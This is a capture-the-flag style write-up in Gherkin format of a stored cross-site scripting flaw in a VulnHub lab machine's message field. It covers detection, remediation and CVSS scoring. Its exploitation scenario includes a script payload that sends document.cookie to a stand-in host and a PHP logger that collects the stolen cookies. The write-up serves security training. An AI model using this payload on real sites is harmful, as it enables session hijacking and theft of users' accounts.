## Version 1.4.1
## language: en

Feature:
  TOE:
    vulnhub
  Location:
    http://192.168.1.76/index.php - message (field)
  CWE:
    CWE-79: Improper Neutralization of Input During Web Page Generation
    ('Cross-site Scripting')
  Rule:
    REQ.173: Discard unsafe inputs
  Goal:
    Execute javascript code
  Recommendation:
    Sanitize inputs

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Arch Linux      | 2020.08.01  |
    | Firefox         | 79.0        |
    | VirtualBox      | 6.1         |
  TOE information:
    Given I am accessing the site at 192.168.1.76
    And it runs on virtualbox

  Scenario: Normal use case
    Given I am logged
    Then I can see a textbox where I can post messages [evidence](normal.png)

  Scenario: Static detection
    Given I don't have access to the source code
    Then I can't perform a static detection

  Scenario: Dynamic detection
    When I post the message
    """
    <b>asd</asd>
    """
    Then I can see "asd" in bold letters [evidence](xss.png)
    And I can conclude that the site is vulnerable to XSS

  Scenario: Exploitation
    Given that the site is vulnerable to XSS
    When I inject the following payload to steal user's cookies:
    """
    <script>
      document.write('<img src="mywebsite/?c=' + document.cookie + '"></img>');
    </script>
    """
    And in "mywebsite" I have the code
    """
    <?php
      if (isset($_GET["c"]) and $_GET["c"]) {
          $log = fopen("log.txt", "a");
          fwrite($log, $_GET["c"] . "\n");
          fclose($log);
      } else {
          echo "Welcome to my new site";
      }
    ?>
    """
    Then I can see [evidence](brokenimage.png)
    When I go to "mywebsite/log.txt"
    Then I can see a list of cookies [evidence](cookies.php)
    And I can conclude that I can exploit the XSS

  Scenario: Remediation
    Given I don't have access to the source code
    Then I recommend using the function
    """
    https://www.php.net/manual/en/function.htmlspecialchars.php
    """
    And set the flag "httponly" in the cookie so it can't be accessed with JS
    """
    https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
    """

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    6.5 (Medium) - AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.2 (Medium) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    4.1 (Medium) - MAV:N/MAC:L/MPR:N/MUI:R/MC:L/MI:N/MA:N

  Scenario: Correlations
    No correlations have been found to this date {2020-08-26}
